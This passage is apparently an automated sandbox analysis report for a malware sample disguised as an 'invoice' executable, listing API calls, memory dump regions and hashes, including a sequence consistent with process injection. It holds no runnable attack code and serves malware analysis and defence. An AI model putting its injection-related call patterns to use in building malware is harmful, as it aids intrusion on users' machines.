                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        APIs
                          • Part of subcall function 00FA02E2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00FA0313
                          • Part of subcall function 00FA02E2: MapVirtualKeyW.USER32(00000010,00000000), ref: 00FA031B
                          • Part of subcall function 00FA02E2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00FA0326
                          • Part of subcall function 00FA02E2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00FA0331
                          • Part of subcall function 00FA02E2: MapVirtualKeyW.USER32(00000011,00000000), ref: 00FA0339
                          • Part of subcall function 00FA02E2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00FA0341
                          • Part of subcall function 00F96259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00F8FA90), ref: 00F962B4
                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00F8FB2D
                        • OleInitialize.OLE32(00000000), ref: 00F8FBAA
                        • CloseHandle.KERNEL32(00000000), ref: 00FC4921
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                        • String ID:
                        • API String ID: 1986988660-0
                        APIs
                        • _memset.LIBCMT ref: 00F84401
                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00F844A6
                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00F844C3
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: IconNotifyShell_$_memset
                        • String ID:
                        • API String ID: 1505330794-0
                        APIs
                        • __FF_MSGBANNER.LIBCMT ref: 00FA58A3
                          • Part of subcall function 00FAA2EB: __NMSG_WRITE.LIBCMT ref: 00FAA312
                          • Part of subcall function 00FAA2EB: __NMSG_WRITE.LIBCMT ref: 00FAA31C
                        • __NMSG_WRITE.LIBCMT ref: 00FA58AA
                          • Part of subcall function 00FAA348: GetModuleFileNameW.KERNEL32(00000000,010433BA,00000104,?,00000001,00000000), ref: 00FAA3DA
                          • Part of subcall function 00FAA348: ___crtMessageBoxW.LIBCMT ref: 00FAA488
                          • Part of subcall function 00FA321F: ___crtCorExitProcess.LIBCMT ref: 00FA3225
                          • Part of subcall function 00FA321F: ExitProcess.KERNEL32 ref: 00FA322E
                          • Part of subcall function 00FA8CA8: __getptd_noexit.LIBCMT ref: 00FA8CA8
                        • RtlAllocateHeap.NTDLL(014F0000,00000000,00000001,00000000,?,?,?,00FA0F53,?), ref: 00FA58CF
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                        • String ID:
                        • API String ID: 1372826849-0
                        APIs
                        • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00FE95F1,?,?,?,?,?,00000004), ref: 00FE9964
                        • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00FE95F1,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00FE997A
                        • CloseHandle.KERNEL32(00000000,?,00FE95F1,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00FE9981
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: File$CloseCreateHandleTime
                        • String ID:
                        • API String ID: 3397143404-0
                        • Opcode ID: 040529922342997cdf5405c8970e8622950f08dadfd717b2c8024fb2c6880d55
                        • Instruction ID: cece92c0cee67b875d530049621310c82d5ad99b32487fdd134d423b799e469f
                        • Opcode Fuzzy Hash: 040529922342997cdf5405c8970e8622950f08dadfd717b2c8024fb2c6880d55
                        • Instruction Fuzzy Hash: 43E08632140215B7DB321B54EC0AFDE7B18AB06B70F108210FB94690D087B61911A798
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID:
                        • String ID: CALL
                        • API String ID: 0-4196123274
                        • Opcode ID: 240e0cb6677e7d2c642246de18733bc894ae0f12d742e0a2374d47abcc142fac
                        • Instruction ID: da5e7bbb9cbe5f6f4ff21e4eaf964d0960cc565926f041e081bc90813c7b54ed
                        • Opcode Fuzzy Hash: 240e0cb6677e7d2c642246de18733bc894ae0f12d742e0a2374d47abcc142fac
                        • Instruction Fuzzy Hash: E8224971508301CFDB24EF14C895BAAB7E1FF85314F14896EE8968B261DB35EC45EB82
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: _memmove
                        • String ID: EA06
                        • API String ID: 4104443479-3962188686
                        • Opcode ID: 29482d25878e981b74602d69c0d08e7bbee9f37ce9e9e4c7e0b527bf06944bac
                        • Instruction ID: 8122808fd14733eb5c3ab130d8a249ad54104a5bd9c1e8d90bf963bd8c0c769b
                        • Opcode Fuzzy Hash: 29482d25878e981b74602d69c0d08e7bbee9f37ce9e9e4c7e0b527bf06944bac
                        • Instruction Fuzzy Hash: 47419D62E0425A5BCF21BB64CC517FE7FA6AB01310F284075FC82DB182D6246D40B7E1
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: _memmove
                        • String ID:
                        • API String ID: 4104443479-0
                        • Opcode ID: 60242e1f48b65c730d09099b3c52416c0981d520889be4a724d5cd7283b8dea3
                        • Instruction ID: 9b3f0b58f7534f50052a401e5640bfc7a5b3ccad48b207f791f53fabbb3f71fe
                        • Opcode Fuzzy Hash: 60242e1f48b65c730d09099b3c52416c0981d520889be4a724d5cd7283b8dea3
                        • Instruction Fuzzy Hash: 1341E4719083459FD720FFA9AC81ABEB7A8EF19350B284459F085AB243DF799C01F761
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: _memmove
                        • String ID:
                        • API String ID: 4104443479-0
                        • Opcode ID: 110dd0e2576012a0094b73eb3352dcde9e624fd67b43ab06109a497bb09d0b37
                        • Instruction ID: 77c8306bcf8b369bb0635368a01957de41503b3e15dd8f30737d3cd871126c66
                        • Opcode Fuzzy Hash: 110dd0e2576012a0094b73eb3352dcde9e624fd67b43ab06109a497bb09d0b37
                        • Instruction Fuzzy Hash: 2731D6B2604606AFC714EF28D8D1FA9F3A9FF493207258629E419CB391DB70E850DB90
                        APIs
                        • IsThemeActive.UXTHEME ref: 00F84992
                          • Part of subcall function 00FA34EC: __lock.LIBCMT ref: 00FA34F2
                          • Part of subcall function 00FA34EC: DecodePointer.KERNEL32(00000001,?,00F849A7,00FD7F9C), ref: 00FA34FE
                          • Part of subcall function 00FA34EC: EncodePointer.KERNEL32(?,?,00F849A7,00FD7F9C), ref: 00FA3509
                          • Part of subcall function 00F84A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00F84A73
                          • Part of subcall function 00F84A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00F84A88
                          • Part of subcall function 00F83B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F83B7A
                          • Part of subcall function 00F83B4C: IsDebuggerPresent.KERNEL32 ref: 00F83B8C
                          • Part of subcall function 00F83B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,010452F8,010452E0,?,?), ref: 00F83BFD
                          • Part of subcall function 00F83B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00F83C81
                        • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00F849D2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                        • String ID:
                        • API String ID: 1438897964-0
                        • Opcode ID: 7da23e1dcc78a2fc44367bb3f51019c921f4a75549a921634b9c49bb7bf09438
                        • Instruction ID: 057e413d7cc8b4e0ea2c27f5284e6fa166b00e4bb8fd0e07dc2697001a6baf7b
                        • Opcode Fuzzy Hash: 7da23e1dcc78a2fc44367bb3f51019c921f4a75549a921634b9c49bb7bf09438
                        • Instruction Fuzzy Hash: 7B11C0B58083019FC720EF68DE8594AFBE8EB89710F00451FF085872A1DBBA9544DB82
                        APIs
                          • Part of subcall function 00FA588C: __FF_MSGBANNER.LIBCMT ref: 00FA58A3
                          • Part of subcall function 00FA588C: __NMSG_WRITE.LIBCMT ref: 00FA58AA
                          • Part of subcall function 00FA588C: RtlAllocateHeap.NTDLL(014F0000,00000000,00000001,00000000,?,?,?,00FA0F53,?), ref: 00FA58CF
                        • std::exception::exception.LIBCMT ref: 00FA0F6C
                        • __CxxThrowException@8.LIBCMT ref: 00FA0F81
                          • Part of subcall function 00FA871B: RaiseException.KERNEL32(?,?,?,01039E78,00000000,?,?,?,?,00FA0F86,?,01039E78,?,00000001), ref: 00FA8770
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                        • String ID:
                        • API String ID: 3902256705-0
                        • Opcode ID: 0bb5f14b56b5316d95a396fb7db9ec4ae3d9be86071e053b7b64543a325c2a2a
                        • Instruction ID: 10ea8a909e25c605bd58930adee8c9f059fad0fab452bc5b27ce14ba49f3ce77
                        • Opcode Fuzzy Hash: 0bb5f14b56b5316d95a396fb7db9ec4ae3d9be86071e053b7b64543a325c2a2a
                        • Instruction Fuzzy Hash: 43F028B180420D6EDB24BA98FC019DE7BACDF02364F100425FC48A6282DFB89A91E2D1
                        APIs
                          • Part of subcall function 00FA8CA8: __getptd_noexit.LIBCMT ref: 00FA8CA8
                        • __lock_file.LIBCMT ref: 00FA555B
                          • Part of subcall function 00FA6D8E: __lock.LIBCMT ref: 00FA6DB1
                        • __fclose_nolock.LIBCMT ref: 00FA5566
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                        • String ID:
                        • API String ID: 2800547568-0
                        • Opcode ID: fb03a7bacf542d59d5b087ff94ebe8b2ae20578700888014fef1c8f3282e60c3
                        • Instruction ID: 4f96dfc239128a6b0d95def00ded2c6f9e2d53bed78eaa7a09e9a120b27006a6
                        • Opcode Fuzzy Hash: fb03a7bacf542d59d5b087ff94ebe8b2ae20578700888014fef1c8f3282e60c3
                        • Instruction Fuzzy Hash: F7F090F1D01A01AED710AB758C0276E76A26F43775F288209F464AB1C1CBBC9A02BB51
                        APIs
                        • CreateProcessW.KERNELBASE(?,00000000), ref: 0152D053
                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0152D0E9
                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0152D10B
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719820104.000000000152B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0152B000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_152b000_invoice.jbxd
                        Similarity
                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                        • String ID:
                        • API String ID: 2438371351-0
                        • Opcode ID: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                        • Instruction ID: f5033139db73803e956fc1d8e4306a821da0cfc5f0745bf403287de90aa6ce54
                        • Opcode Fuzzy Hash: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                        • Instruction Fuzzy Hash: 2512EE24E18658C6EB24DF64D8507DEB232FF68300F1090E9D10DEB7A5E77A5E81CB5A
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: ProtectVirtual
                        • String ID:
                        • API String ID: 544645111-0
                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                        • Instruction ID: e6457553a15d225e6e7b0a3f320f629aa69ff9969c2755d51133ab0ddcb2e7b1
                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                        • Instruction Fuzzy Hash: 6231B7B5A001059FC718DF58E4C4A69FBA6FF4A310B6486A5E409CB255DF31EDD1EB80
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: ClearVariant
                        • String ID:
                        • API String ID: 1473721057-0
                        • Opcode ID: 7d8c08cf8817e87c13e3313b613558701c69cbe0b0053d7051a0a36c9bcbd094
                        • Instruction ID: 0e7474f37adfe5b2ee09fb0b20f2ebf746e31f88982a466e26972f44a73acf18
                        • Opcode Fuzzy Hash: 7d8c08cf8817e87c13e3313b613558701c69cbe0b0053d7051a0a36c9bcbd094
                        • Instruction Fuzzy Hash: D741F775908341CFDB24DF14C484B5ABBE0FF45318F1988ACE8958B762C736E846DB52
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: _memmove
                        • String ID:
                        • API String ID: 4104443479-0
                        • Opcode ID: 7d6f510797fd83e004306c6ccfe9b33ee9071dde48a88281e1839a6a3e2f3f88
                        • Instruction ID: 5df01290494adc7fe317fdfa8af60e7c3f8a52466f2d50ee1477b9ce8f4683e8
                        • Opcode Fuzzy Hash: 7d6f510797fd83e004306c6ccfe9b33ee9071dde48a88281e1839a6a3e2f3f88
                        • Instruction Fuzzy Hash: D72133B2A04608EBCB246F22FC417E97BB8FF14390F21842EE486C50A5EB35D490BB54
                        APIs
                          • Part of subcall function 00F84D13: FreeLibrary.KERNEL32(00000000,?), ref: 00F84D4D
                          • Part of subcall function 00FA53CB: __wfsopen.LIBCMT ref: 00FA53D6
                        • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,010452F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00F84F6F
                          • Part of subcall function 00F84CC8: FreeLibrary.KERNEL32(00000000), ref: 00F84D02
                          • Part of subcall function 00F84DD0: _memmove.LIBCMT ref: 00F84E1A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Library$Free$Load__wfsopen_memmove
                        • String ID:
                        • API String ID: 1396898556-0
                        • Opcode ID: a9f7bd83fb377cf679f0cb23ecfaf012e68c7ef19ba5e0891a8704055c68b71a
                        • Instruction ID: 00400d54c3113286a420fbaa05eddac3cd3814033f8d2ba809c43fdd23caff75
                        • Opcode Fuzzy Hash: a9f7bd83fb377cf679f0cb23ecfaf012e68c7ef19ba5e0891a8704055c68b71a
                        • Instruction Fuzzy Hash: 8411C43260070BABCB21FF61CC12FEE77A99F40714F10881DF541A7181EAB9AA05BB61
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: ClearVariant
                        • String ID:
                        • API String ID: 1473721057-0
                        • Opcode ID: 21d4e4f4b9c08e5c3e9317fd09b92c22d38eceefbc25137f27391add8b39ae7a
                        • Instruction ID: da1c5a0fbbc3160688735ef85c9a2d93f185230311c60a83b49e657bdc721542
                        • Opcode Fuzzy Hash: 21d4e4f4b9c08e5c3e9317fd09b92c22d38eceefbc25137f27391add8b39ae7a
                        • Instruction Fuzzy Hash: E22113B1908342CFDB24EF14C844B5ABBE0FF89314F05896CE89657761DB35E805EB92
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: _memmove
                        • String ID:
                        • API String ID: 4104443479-0
                        • Opcode ID: 934396340b51902128352361dc00ee99dd049bb3fb4110ca6547e3f261a09c37
                        • Instruction ID: 4720afb3608d1c872f5c46dc5bdc19246322b24a43a794d924e4f1cdce28dfe4
                        • Opcode Fuzzy Hash: 934396340b51902128352361dc00ee99dd049bb3fb4110ca6547e3f261a09c37
                        • Instruction Fuzzy Hash: 7D01FEB36047017ED3206F39DC06F67B7A4DB45760F10852DF61ACA1D1DA75E400A790
                        APIs
                        • __lock_file.LIBCMT ref: 00FA4A16
                          • Part of subcall function 00FA8CA8: __getptd_noexit.LIBCMT ref: 00FA8CA8
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: __getptd_noexit__lock_file
                        • String ID:
                        • API String ID: 2597487223-0
                        • Opcode ID: 645d9c321f071568f073f67a8fb08b13bc205dca28935730304c19c757f93c7e
                        • Instruction ID: 8999609af01521a03cb80f4a35b8e7cfa7cebffc2ada3f00594dcda483e9e457
                        • Opcode Fuzzy Hash: 645d9c321f071568f073f67a8fb08b13bc205dca28935730304c19c757f93c7e
                        • Instruction Fuzzy Hash: 3AF0C2B2940206EBDF11AFB4CC0639F76A1AF823A5F048514F424AA191DBFC9A11FF55
                        APIs
                        • FreeLibrary.KERNEL32(?,?,010452F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00F84FDE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
